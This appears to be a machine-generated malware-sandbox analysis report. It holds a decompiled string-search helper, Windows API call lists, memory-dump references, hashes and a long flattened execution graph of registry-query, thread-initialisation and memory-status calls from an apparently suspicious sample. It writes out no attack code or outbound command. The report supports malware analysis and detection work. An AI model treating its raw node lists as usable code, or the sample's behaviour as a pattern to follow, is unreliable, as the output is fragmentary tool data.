                                                                                                                        • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                        • Instruction ID: d2786f61c86b799b8b6ecf14661ff9643eaf9d362a95097130d0805b1e4d2bc4
                                                                                                                        • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                        • Instruction Fuzzy Hash: 36D0A7B3410D20DAC3126718DC04DAF73ECFF6134074A442AF481A71A4D7785E8186ED
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1129932425.0000000070B21000.00000020.00000001.01000000.00000005.sdmp, Offset: 70B20000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1129862277.0000000070B20000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000000.00000002.1129989345.0000000070B24000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000000.00000002.1130059756.0000000070B26000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_70b20000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeGlobal
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2979337801-0
                                                                                                                        • Opcode ID: 1b6b8df879728b5e109e4e43986625ba1d6460b5775daaeb3dd98ca6a2205bda
                                                                                                                        • Instruction ID: 84b57688d6bcf5864de7f13defe457848063449b46ccde84f1a0f16da59a00d1
                                                                                                                        • Opcode Fuzzy Hash: 1b6b8df879728b5e109e4e43986625ba1d6460b5775daaeb3dd98ca6a2205bda
                                                                                                                        • Instruction Fuzzy Hash: 87219E76804645EFDB11CFA4E9806DEB7F5FF88316F20486AD0AED2240E774AA81CF50
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                                                                        				int _v8;
                                                                                                                        				int _t12;
                                                                                                                        				int _t14;
                                                                                                                        				int _t15;
                                                                                                                        				CHAR* _t17;
                                                                                                                        				CHAR* _t27;
                                                                                                                        
                                                                                                                        				_t12 = lstrlenA(_a8);
                                                                                                                        				_t27 = _a4;
                                                                                                                        				_v8 = _t12;
                                                                                                                        				while(lstrlenA(_t27) >= _v8) {
                                                                                                                        					_t14 = _v8;
                                                                                                                        					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                                                                        					_t15 = lstrcmpiA(_t27, _a8);
                                                                                                                        					_t27[_v8] =  *(_t14 + _t27);
                                                                                                                        					if(_t15 == 0) {
                                                                                                                        						_t17 = _t27;
                                                                                                                        					} else {
                                                                                                                        						_t27 = CharNextA(_t27);
                                                                                                                        						continue;
                                                                                                                        					}
                                                                                                                        					L5:
                                                                                                                        					return _t17;
                                                                                                                        				}
                                                                                                                        				_t17 = 0;
                                                                                                                        				goto L5;
                                                                                                                        			}










                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
                                                                                                                        • CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                                                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 190613189-0
                                                                                                                        • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                        • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                                                                                                                        • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                        • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:15.5%
                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                        Signature Coverage:0.6%
                                                                                                                        Total number of Nodes:1130
                                                                                                                        Total number of Limit Nodes:53
RegQueryValueExW 62955->62972 62973 20ada628 RegQueryValueExW 62955->62973 62974 20ada9f5 RegQueryValueExW 62955->62974 62975 20ada840 RegQueryValueExW 62955->62975 62961 20adeac1 LdrInitializeThunk 62956->62961 62962 20adeb20 LdrInitializeThunk 62956->62962 62957 1da1ee48 62967 20adf2a8 2 API calls 62957->62967 62968 20adf248 2 API calls 62957->62968 62958 1da1eef2 62958->62492 62959->62954 62960->62954 62961->62957 62962->62957 62963->62955 62964->62955 62965->62955 62966->62955 62967->62958 62968->62958 62969->62953 62970->62953 62971->62953 62972->62956 62973->62956 62974->62956 62975->62956 62977 1da1eb21 62976->62977 62978 1da1ec4e 62977->62978 62983 20ada5c8 RegQueryValueExW 62977->62983 62984 20ada628 RegQueryValueExW 62977->62984 62985 20ada9f5 RegQueryValueExW 62977->62985 62986 20ada840 RegQueryValueExW 62977->62986 62987 20adeac1 LdrInitializeThunk 62978->62987 62988 20adeb20 LdrInitializeThunk 62978->62988 62979 1da1ee48 62981 20adf2a8 2 API calls 62979->62981 62982 20adf248 2 API calls 62979->62982 62980 1da1eef2 62980->62492 62981->62980 62982->62980 62983->62978 62984->62978 62985->62978 62986->62978 62987->62979 62988->62979 62990 1da1e51c 62989->62990 62999 20ad7598 2 API calls 62990->62999 63000 20ad7518 2 API calls 62990->63000 63001 20ad7a50 2 API calls 62990->63001 62991 1da1e831 63006 20ad8b3d 3 API calls 62991->63006 63007 20ad8b90 3 API calls 62991->63007 62992 1da1e9d2 63008 20ad9439 3 API calls 62992->63008 63009 20ad9498 3 API calls 62992->63009 63010 20ad97a7 3 API calls 62992->63010 63011 20ad95e0 3 API calls 62992->63011 62993 1da1eaaa 62994 1da1ec4e 62993->62994 63002 20ada5c8 RegQueryValueExW 62993->63002 63003 20ada628 RegQueryValueExW 62993->63003 63004 20ada9f5 RegQueryValueExW 62993->63004 63005 20ada840 RegQueryValueExW 62993->63005 63012 20adeac1 LdrInitializeThunk 62994->63012 63013 20adeb20 LdrInitializeThunk 62994->63013 62995 1da1ee48 62997 20adf2a8 2 API calls 62995->62997 62998 20adf248 2 API calls 62995->62998 62996 
1da1eef2 62996->62492 62997->62996 62998->62996 62999->62991 63000->62991 63001->62991 63002->62994 63003->62994 63004->62994 63005->62994 63006->62992 63007->62992 63008->62993 63009->62993 63010->62993 63011->62993 63012->62995 63013->62995 63015 1da1e79b 63014->63015 63036 20ad7598 2 API calls 63015->63036 63037 20ad7518 2 API calls 63015->63037 63038 20ad7a50 2 API calls 63015->63038 63016 1da1e831 63026 20ad8b3d 3 API calls 63016->63026 63027 20ad8b90 3 API calls 63016->63027 63017 1da1e9d2 63030 20ad9439 3 API calls 63017->63030 63031 20ad9498 3 API calls 63017->63031 63032 20ad97a7 3 API calls 63017->63032 63033 20ad95e0 3 API calls 63017->63033 63018 1da1eaaa 63019 1da1ec4e 63018->63019 63022 20ada5c8 RegQueryValueExW 63018->63022 63023 20ada628 RegQueryValueExW 63018->63023 63024 20ada9f5 RegQueryValueExW 63018->63024 63025 20ada840 RegQueryValueExW 63018->63025 63028 20adeac1 LdrInitializeThunk 63019->63028 63029 20adeb20 LdrInitializeThunk 63019->63029 63020 1da1ee48 63034 20adf2a8 2 API calls 63020->63034 63035 20adf248 2 API calls 63020->63035 63021 1da1eef2 63021->62492 63022->63019 63023->63019 63024->63019 63025->63019 63026->63017 63027->63017 63028->63020 63029->63020 63030->63018 63031->63018 63032->63018 63033->63018 63034->63021 63035->63021 63036->63016 63037->63016 63038->63016 63040 1da1ea46 63039->63040 63051 20ad9439 3 API calls 63040->63051 63052 20ad9498 3 API calls 63040->63052 63053 20ad97a7 3 API calls 63040->63053 63054 20ad95e0 3 API calls 63040->63054 63041 1da1eaaa 63042 1da1ec4e 63041->63042 63045 20ada5c8 RegQueryValueExW 63041->63045 63046 20ada628 RegQueryValueExW 63041->63046 63047 20ada9f5 RegQueryValueExW 63041->63047 63048 20ada840 RegQueryValueExW 63041->63048 63049 20adeac1 LdrInitializeThunk 63042->63049 63050 20adeb20 LdrInitializeThunk 63042->63050 63043 1da1ee48 63055 20adf2a8 2 API calls 63043->63055 63056 20adf248 2 API calls 63043->63056 63044 1da1eef2 63044->62492 63045->63042 63046->63042 63047->63042 
63048->63042 63049->63043 63050->63043 63051->63041 63052->63041 63053->63041 63054->63041 63055->63044 63056->63044 63058 1da1e6c6 63057->63058 63067 20ad7598 2 API calls 63058->63067 63068 20ad7518 2 API calls 63058->63068 63069 20ad7a50 2 API calls 63058->63069 63059 1da1e831 63074 20ad8b3d 3 API calls 63059->63074 63075 20ad8b90 3 API calls 63059->63075 63060 1da1e9d2 63078 20ad9439 3 API calls 63060->63078 63079 20ad9498 3 API calls 63060->63079 63080 20ad97a7 3 API calls 63060->63080 63081 20ad95e0 3 API calls 63060->63081 63061 1da1eaaa 63062 1da1ec4e 63061->63062 63070 20ada5c8 RegQueryValueExW 63061->63070 63071 20ada628 RegQueryValueExW 63061->63071 63072 20ada9f5 RegQueryValueExW 63061->63072 63073 20ada840 RegQueryValueExW 63061->63073 63076 20adeac1 LdrInitializeThunk 63062->63076 63077 20adeb20 LdrInitializeThunk 63062->63077 63063 1da1ee48 63065 20adf2a8 2 API calls 63063->63065 63066 20adf248 2 API calls 63063->63066 63064 1da1eef2 63064->62492 63065->63064 63066->63064 63067->63059 63068->63059 63069->63059 63070->63062 63071->63062 63072->63062 63073->63062 63074->63060 63075->63060 63076->63063 63077->63063 63078->63061 63079->63061 63080->63061 63081->63061 63083 1da1e447 63082->63083 63092 20ad7598 2 API calls 63083->63092 63093 20ad7518 2 API calls 63083->63093 63094 20ad7a50 2 API calls 63083->63094 63084 1da1e831 63099 20ad8b3d 3 API calls 63084->63099 63100 20ad8b90 3 API calls 63084->63100 63085 1da1e9d2 63101 20ad9439 3 API calls 63085->63101 63102 20ad9498 3 API calls 63085->63102 63103 20ad97a7 3 API calls 63085->63103 63104 20ad95e0 3 API calls 63085->63104 63086 1da1eaaa 63087 1da1ec4e 63086->63087 63095 20ada5c8 RegQueryValueExW 63086->63095 63096 20ada628 RegQueryValueExW 63086->63096 63097 20ada9f5 RegQueryValueExW 63086->63097 63098 20ada840 RegQueryValueExW 63086->63098 63105 20adeac1 LdrInitializeThunk 63087->63105 63106 20adeb20 LdrInitializeThunk 63087->63106 63088 1da1ee48 63090 20adf2a8 2 API calls 63088->63090 63091 
20adf248 2 API calls 63088->63091 63089 1da1eef2 63089->62492 63090->63089 63091->63089 63092->63084 63093->63084 63094->63084 63095->63087 63096->63087 63097->63087 63098->63087 63099->63085 63100->63085 63101->63086 63102->63086 63103->63086 63104->63086 63105->63088 63106->63088 63108 1da1ecc5 63107->63108 63111 20adeac1 LdrInitializeThunk 63108->63111 63112 20adeb20 LdrInitializeThunk 63108->63112 63109 1da1ee48 63113 20adf2a8 2 API calls 63109->63113 63114 20adf248 2 API calls 63109->63114 63110 1da1eef2 63110->62492 63111->63109 63112->63109 63113->63110 63114->63110 63116 1da1e9b8 63115->63116 63126 20ad8b3d 3 API calls 63116->63126 63127 20ad8b90 3 API calls 63116->63127 63117 1da1e9d2 63130 20ad9439 3 API calls 63117->63130 63131 20ad9498 3 API calls 63117->63131 63132 20ad97a7 3 API calls 63117->63132 63133 20ad95e0 3 API calls 63117->63133 63118 1da1eaaa 63119 1da1ec4e 63118->63119 63122 20ada5c8 RegQueryValueExW 63118->63122 63123 20ada628 RegQueryValueExW 63118->63123 63124 20ada9f5 RegQueryValueExW 63118->63124 63125 20ada840 RegQueryValueExW 63118->63125 63128 20adeac1 LdrInitializeThunk 63119->63128 63129 20adeb20 LdrInitializeThunk 63119->63129 63120 1da1ee48 63134 20adf2a8 2 API calls 63120->63134 63135 20adf248 2 API calls 63120->63135 63121 1da1eef2 63121->62492 63122->63119 63123->63119 63124->63119 63125->63119 63126->63117 63127->63117 63128->63120 63129->63120 63130->63118 63131->63118 63132->63118 63133->63118 63134->63121 63135->63121 63137 1da1e638 63136->63137 63152 20ad7598 2 API calls 63137->63152 63153 20ad7518 2 API calls 63137->63153 63154 20ad7a50 2 API calls 63137->63154 63138 1da1e831 63159 20ad8b3d 3 API calls 63138->63159 63160 20ad8b90 3 API calls 63138->63160 63139 1da1e9d2 63146 20ad9439 3 API calls 63139->63146 63147 20ad9498 3 API calls 63139->63147 63148 20ad97a7 3 API calls 63139->63148 63149 20ad95e0 3 API calls 63139->63149 63140 1da1eaaa 63141 1da1ec4e 63140->63141 63155 20ada5c8 RegQueryValueExW 63140->63155 63156 
20ada628 RegQueryValueExW 63140->63156 63157 20ada9f5 RegQueryValueExW 63140->63157 63158 20ada840 RegQueryValueExW 63140->63158 63144 20adeac1 LdrInitializeThunk 63141->63144 63145 20adeb20 LdrInitializeThunk 63141->63145 63142 1da1ee48 63150 20adf2a8 2 API calls 63142->63150 63151 20adf248 2 API calls 63142->63151 63143 1da1eef2 63143->62492 63144->63142 63145->63142 63146->63140 63147->63140 63148->63140 63149->63140 63150->63143 63151->63143 63152->63138 63153->63138 63154->63138 63155->63141 63156->63141 63157->63141 63158->63141 63159->63139 63160->63139 63162 1da1e3b9 63161->63162 63171 20ad7598 2 API calls 63162->63171 63172 20ad7518 2 API calls 63162->63172 63173 20ad7a50 2 API calls 63162->63173 63163 1da1e831 63178 20ad8b3d 3 API calls 63163->63178 63179 20ad8b90 3 API calls 63163->63179 63164 1da1e9d2 63180 20ad9439 3 API calls 63164->63180 63181 20ad9498 3 API calls 63164->63181 63182 20ad97a7 3 API calls 63164->63182 63183 20ad95e0 3 API calls 63164->63183 63165 1da1eaaa 63166 1da1ec4e 63165->63166 63174 20ada5c8 RegQueryValueExW 63165->63174 63175 20ada628 RegQueryValueExW 63165->63175 63176 20ada9f5 RegQueryValueExW 63165->63176 63177 20ada840 RegQueryValueExW 63165->63177 63184 20adeac1 LdrInitializeThunk 63166->63184 63185 20adeb20 LdrInitializeThunk 63166->63185 63167 1da1ee48 63169 20adf2a8 2 API calls 63167->63169 63170 20adf248 2 API calls 63167->63170 63168 1da1eef2 63168->62492 63169->63168 63170->63168 63171->63163 63172->63163 63173->63163 63174->63166 63175->63166 63176->63166 63177->63166 63178->63164 63179->63164 63180->63165 63181->63165 63182->63165 63183->63165 63184->63167 63185->63167 63187 1da1e933 63186->63187 63193 20ad8b3d 3 API calls 63187->63193 63194 20ad8b90 3 API calls 63187->63194 63188 1da1e9d2 63195 20ad9439 3 API calls 63188->63195 63196 20ad9498 3 API calls 63188->63196 63197 20ad97a7 3 API calls 63188->63197 63198 20ad95e0 3 API calls 63188->63198 63189 1da1eaaa 63190 1da1ec4e 63189->63190 63203 20ada5c8 
RegQueryValueExW 63189->63203 63204 20ada628 RegQueryValueExW 63189->63204 63205 20ada9f5 RegQueryValueExW 63189->63205 63206 20ada840 RegQueryValueExW 63189->63206 63199 20adeac1 LdrInitializeThunk 63190->63199 63200 20adeb20 LdrInitializeThunk 63190->63200 63191 1da1ee48 63201 20adf2a8 2 API calls 63191->63201 63202 20adf248 2 API calls 63191->63202 63192 1da1eef2 63192->62492 63193->63188 63194->63188 63195->63189 63196->63189 63197->63189 63198->63189 63199->63191 63200->63191 63201->63192 63202->63192 63203->63190 63204->63190 63205->63190 63206->63190 63208 1da1e5f1 63207->63208 63217 20ad7598 2 API calls 63208->63217 63218 20ad7518 2 API calls 63208->63218 63219 20ad7a50 2 API calls 63208->63219 63209 1da1e831 63224 20ad8b3d 3 API calls 63209->63224 63225 20ad8b90 3 API calls 63209->63225 63210 1da1e9d2 63226 20ad9439 3 API calls 63210->63226 63227 20ad9498 3 API calls 63210->63227 63228 20ad97a7 3 API calls 63210->63228 63229 20ad95e0 3 API calls 63210->63229 63211 1da1eaaa 63212 1da1ec4e 63211->63212 63220 20ada5c8 RegQueryValueExW 63211->63220 63221 20ada628 RegQueryValueExW 63211->63221 63222 20ada9f5 RegQueryValueExW 63211->63222 63223 20ada840 RegQueryValueExW 63211->63223 63230 20adeac1 LdrInitializeThunk 63212->63230 63231 20adeb20 LdrInitializeThunk 63212->63231 63213 1da1ee48 63215 20adf2a8 2 API calls 63213->63215 63216 20adf248 2 API calls 63213->63216 63214 1da1eef2 63214->62492 63215->63214 63216->63214 63217->63209 63218->63209 63219->63209 63220->63212 63221->63212 63222->63212 63223->63212 63224->63210 63225->63210 63226->63211 63227->63211 63228->63211 63229->63211 63230->63213 63231->63213 63233 1da1e8ec 63232->63233 63243 20ad8b3d 3 API calls 63233->63243 63244 20ad8b90 3 API calls 63233->63244 63234 1da1e9d2 63245 20ad9439 3 API calls 63234->63245 63246 20ad9498 3 API calls 63234->63246 63247 20ad97a7 3 API calls 63234->63247 63248 20ad95e0 3 API calls 63234->63248 63235 1da1eaaa 63236 1da1ec4e 63235->63236 63239 20ada5c8 
RegQueryValueExW 63235->63239 63240 20ada628 RegQueryValueExW 63235->63240 63241 20ada9f5 RegQueryValueExW 63235->63241 63242 20ada840 RegQueryValueExW 63235->63242 63249 20adeac1 LdrInitializeThunk 63236->63249 63250 20adeb20 LdrInitializeThunk 63236->63250 63237 1da1ee48 63251 20adf2a8 2 API calls 63237->63251 63252 20adf248 2 API calls 63237->63252 63238 1da1eef2 63238->62492 63239->63236 63240->63236 63241->63236 63242->63236 63243->63234 63244->63234 63245->63235 63246->63235 63247->63235 63248->63235 63249->63237 63250->63237 63251->63238 63252->63238 63254 1da1e563 63253->63254 63261 20ad7598 2 API calls 63254->63261 63262 20ad7518 2 API calls 63254->63262 63263 20ad7a50 2 API calls 63254->63263 63255 1da1e831 63268 20ad8b3d 3 API calls 63255->63268 63269 20ad8b90 3 API calls 63255->63269 63256 1da1e9d2 63272 20ad9439 3 API calls 63256->63272 63273 20ad9498 3 API calls 63256->63273 63274 20ad97a7 3 API calls 63256->63274 63275 20ad95e0 3 API calls 63256->63275 63257 1da1eaaa 63258 1da1ec4e 63257->63258 63264 20ada5c8 RegQueryValueExW 63257->63264 63265 20ada628 RegQueryValueExW 63257->63265 63266 20ada9f5 RegQueryValueExW 63257->63266 63267 20ada840 RegQueryValueExW 63257->63267 63270 20adeac1 LdrInitializeThunk 63258->63270 63271 20adeb20 LdrInitializeThunk 63258->63271 63259 1da1ee48 63276 20adf2a8 2 API calls 63259->63276 63277 20adf248 2 API calls 63259->63277 63260 1da1eef2 63260->62492 63261->63255 63262->63255 63263->63255 63264->63258 63265->63258 63266->63258 63267->63258 63268->63256 63269->63256 63270->63259 63271->63259 63272->63257 63273->63257 63274->63257 63275->63257 63276->63260 63277->63260 63279 1da1ede1 63278->63279 63284 20adeac1 LdrInitializeThunk 63279->63284 63285 20adeb20 LdrInitializeThunk 63279->63285 63280 1da1ee48 63282 20adf2a8 2 API calls 63280->63282 63283 20adf248 2 API calls 63280->63283 63281 1da1eef2 63281->62492 63282->63281 63283->63281 63284->63280 63285->63280 63287 1da1e85e 63286->63287 63305 20ad8b3d 3 API calls 
63287->63305 63306 20ad8b90 3 API calls 63287->63306 63288 1da1e9d2 63293 20ad9439 3 API calls 63288->63293 63294 20ad9498 3 API calls 63288->63294 63295 20ad97a7 3 API calls 63288->63295 63296 20ad95e0 3 API calls 63288->63296 63289 1da1eaaa 63290 1da1ec4e 63289->63290 63301 20ada5c8 RegQueryValueExW 63289->63301 63302 20ada628 RegQueryValueExW 63289->63302 63303 20ada9f5 RegQueryValueExW 63289->63303 63304 20ada840 RegQueryValueExW 63289->63304 63297 20adeac1 LdrInitializeThunk 63290->63297 63298 20adeb20 LdrInitializeThunk 63290->63298 63291 1da1ee48 63299 20adf2a8 2 API calls 63291->63299 63300 20adf248 2 API calls 63291->63300 63292 1da1eef2 63292->62492 63293->63289 63294->63289 63295->63289 63296->63289 63297->63291 63298->63291 63299->63292 63300->63292 63301->63290 63302->63290 63303->63290 63304->63290 63305->63288 63306->63288 63308 1da1eb5f 63307->63308 63315 20ada5c8 RegQueryValueExW 63308->63315 63316 20ada628 RegQueryValueExW 63308->63316 63317 1da1ec4e 63308->63317 63318 20ada9f5 RegQueryValueExW 63308->63318 63319 20ada840 RegQueryValueExW 63308->63319 63309 1da1ee48 63313 20adf2a8 2 API calls 63309->63313 63314 20adf248 2 API calls 63309->63314 63310 1da1eef2 63310->62492 63311 20adeac1 LdrInitializeThunk 63311->63309 63312 20adeb20 LdrInitializeThunk 63312->63309 63313->63310 63314->63310 63315->63317 63316->63317 63317->63311 63317->63312 63318->63317 63319->63317 63321 1da1e34e 63320->63321 63330 20ad7598 2 API calls 63321->63330 63331 20ad7518 2 API calls 63321->63331 63332 20ad7a50 2 API calls 63321->63332 63322 1da1e831 63337 20ad8b3d 3 API calls 63322->63337 63338 20ad8b90 3 API calls 63322->63338 63323 1da1e9d2 63339 20ad9439 3 API calls 63323->63339 63340 20ad9498 3 API calls 63323->63340 63341 20ad97a7 3 API calls 63323->63341 63342 20ad95e0 3 API calls 63323->63342 63324 1da1eaaa 63325 1da1ec4e 63324->63325 63333 20ada5c8 RegQueryValueExW 63324->63333 63334 20ada628 RegQueryValueExW 63324->63334 63335 20ada9f5 RegQueryValueExW 
63324->63335 63336 20ada840 RegQueryValueExW 63324->63336 63343 20adeac1 LdrInitializeThunk 63325->63343 63344 20adeb20 LdrInitializeThunk 63325->63344 63326 1da1ee48 63328 20adf2a8 2 API calls 63326->63328 63329 20adf248 2 API calls 63326->63329 63327 1da1eef2 63327->62492 63328->63327 63329->63327 63330->63322 63331->63322 63332->63322 63333->63325 63334->63325 63335->63325 63336->63325 63337->63323 63338->63323 63339->63324 63340->63324 63341->63324 63342->63324 63343->63326 63344->63326 63349 20ad7599 63345->63349 63346 20ad75b1 63346->62548 63348 20ad6550 RegQueryValueExW 63348->63349 63349->63346 63349->63348 63446 20ad6544 63349->63446 63351 20ad7529 63350->63351 63352 20ad754c 63350->63352 63351->62548 63352->62548 63353 20ad75b1 63352->63353 63354 20ad6544 RegOpenKeyExW 63352->63354 63355 20ad6550 RegQueryValueExW 63352->63355 63353->62548 63354->63352 63355->63352 63357 20ad7a61 63356->63357 63361 20ad7a84 63356->63361 63357->62548 63358 20ad7ab1 63358->62548 63359 20ad6544 RegOpenKeyExW 63359->63361 63360 20ad6550 RegQueryValueExW 63360->63361 63361->63358 63361->63359 63361->63360 63363 20ad8b51 63362->63363 63368 20ad8b74 63362->63368 63363->62549 63364 20ad8b07 63364->62549 63365 20ad9197 LdrInitializeThunk 63366 20ad91b3 63365->63366 63367 20ad7518 2 API calls 63366->63367 63369 20ad91eb 63366->63369 63367->63369 63368->63364 63368->63365 63375 20ad8baf 63370->63375 63371 20ad8cd8 63371->62549 63372 20ad9197 LdrInitializeThunk 63373 20ad91b3 63372->63373 63374 20ad7518 2 API calls 63373->63374 63376 20ad91eb 63373->63376 63374->63376 63375->63371 63375->63372 63383 20ad94b9 63377->63383 63378 20ad97df 63378->62550 63379 20ad7518 2 API calls 63381 20ad97ea 63379->63381 63381->63379 63384 20ad9819 63381->63384 63450 20ad8068 RegQueryValueExW 63381->63450 63382 20ad7518 2 API calls 63382->63383 63383->63378 63383->63381 63383->63382 63384->62550 63392 20ad959e 63385->63392 63386 20ad97df 63386->62550 63387 20ad7518 2 API calls 63387->63392 63388 
20ad7518 2 API calls 63391 20ad97ea 63388->63391 63389 20ad9819 63389->62550 63391->63388 63391->63389 63451 20ad8068 RegQueryValueExW 63391->63451 63392->63386 63392->63387 63392->63391 63394 20ad9459 63393->63394 63396 20ad947c 63393->63396 63394->62550 63395 20ad97df 63395->62550 63396->63395 63399 20ad97ea 63396->63399 63400 20ad7518 2 API calls 63396->63400 63397 20ad7518 2 API calls 63397->63399 63399->63397 63401 20ad9819 63399->63401 63452 20ad8068 RegQueryValueExW 63399->63452 63400->63396 63401->62550 63408 20ad959e 63402->63408 63403 20ad97df 63403->62550 63404 20ad7518 2 API calls 63406 20ad97ea 63404->63406 63406->63404 63409 20ad9819 63406->63409 63453 20ad8068 RegQueryValueExW 63406->63453 63407 20ad7518 2 API calls 63407->63408 63408->63403 63408->63406 63408->63407 63409->62550 63411 20ada861 63410->63411 63414 20ada884 63410->63414 63411->62551 63413 20adaa1b 63413->62551 63414->63413 63454 20ad8068 RegQueryValueExW 63414->63454 63416 20ada647 63415->63416 63417 20ada825 63416->63417 63455 20ad8068 RegQueryValueExW 63416->63455 63417->62551 63422 20ada90c 63419->63422 63421 20adaa1b 63421->62551 63422->63421 63456 20ad8068 RegQueryValueExW 63422->63456 63424 20ada5e9 63423->63424 63427 20ada60c 63423->63427 63424->62551 63426 20ada825 63426->62551 63427->63426 63457 20ad8068 RegQueryValueExW 63427->63457 63429 20adeb3f LdrInitializeThunk 63428->63429 63431 20adeb90 63429->63431 63431->62552 63433 20adeae1 63432->63433 63434 20adeb04 LdrInitializeThunk 63432->63434 63433->62552 63436 20adeb90 63434->63436 63436->62552 63438 20adf2c7 63437->63438 63439 20adf48f 63438->63439 63440 20ad7518 2 API calls 63438->63440 63439->62553 63440->63438 63442 20adf269 63441->63442 63445 20adf28c 63441->63445 63442->62553 63443 20adf48f 63443->62553 63444 20ad7518 2 API calls 63444->63445 63445->63443 63445->63444 63447 20ad7e00 RegOpenKeyExW 63446->63447 63449 20ad7ec6 63447->63449 63450->63381 63451->63391 63452->63399 63453->63406 63454->63414 63455->63416 
63456->63422 63457->63427 63460 20ac045d 63458->63460 63459 20ac073c 63459->62538 63460->63459 63463 20ac0db8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 63460->63463 63465 20ac0e80 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 63460->63465 63466 20ac0db2 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 63460->63466 63476 20ac0758 63460->63476 63483 20ac08f0 63460->63483 63487 20ac0ffb 63460->63487 63463->63460 63465->63460 63466->63460 63469 20ac0448 63467->63469 63468 20ac073c 63468->62538 63469->63468 63470 20ac0758 3 API calls 63469->63470 63471 20ac08f0 3 API calls 63469->63471 63472 20ac0db8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 63469->63472 63473 20ac0ffb 3 API calls 63469->63473 63474 20ac0e80 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 63469->63474 63475 20ac0db2 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 63469->63475 63470->63469 63471->63469 63472->63469 63473->63469 63474->63469 63475->63469 63477 20ac0779 63476->63477 63478 20ac079c 63476->63478 63477->63460 63479 20ac07c6 63478->63479 63492 20ac0db8 63478->63492 63501 20ac0db2 63478->63501 63479->63460 63480 20ac0917 63480->63460 63484 20ac0917 63483->63484 63485 20ac0db8 3 API calls 63483->63485 63486 20ac0db2 3 API calls 63483->63486 63484->63460 63485->63484 63486->63484 63488 20ac0ffc 63487->63488 63489 20ac103e 63488->63489 63490 20ac11e8 3 API calls 63488->63490 63491 20ac11f8 3 API calls 63488->63491 63489->63460 63490->63489 63491->63489 63493 20ac0e0d 63492->63493 63494 20ac0dcc 63492->63494 63493->63480 63494->63493 63495 20ac0f3f 63494->63495 63497 20ac0f4d 63494->63497 63496 20ac08f0 3 API calls 63495->63496 63498 20ac0f46 63496->63498 63497->63498 63510 20ac11e8 63497->63510 63514 20ac11f8 63497->63514 63498->63480 63502 20ac0dcc 63501->63502 63503 20ac0e0d 63501->63503 63502->63503 63504 20ac0f3f 63502->63504 63506 20ac0f4d 63502->63506 63503->63480 63505 20ac08f0 3 API calls 
